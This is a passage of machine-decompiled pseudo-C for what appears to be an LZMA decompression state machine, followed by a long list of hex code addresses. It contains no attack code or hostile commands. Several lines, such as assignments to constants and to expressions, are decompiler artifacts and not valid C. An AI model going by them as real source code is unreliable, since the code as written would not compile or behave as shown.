											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x0040656c
                                                                                                        0x00406570
                                                                                                        0x00406574
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040689f
                                                                                                        0x004068a8
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068f6
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x004068f8
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x004069ad
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x0040687b
                                                                                                        0x00406881
                                                                                                        0x00406888
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00000000
                                                                                                        0x00406893
                                                                                                        0x004068fd
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcb
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd5
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406030
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607a
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a4
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
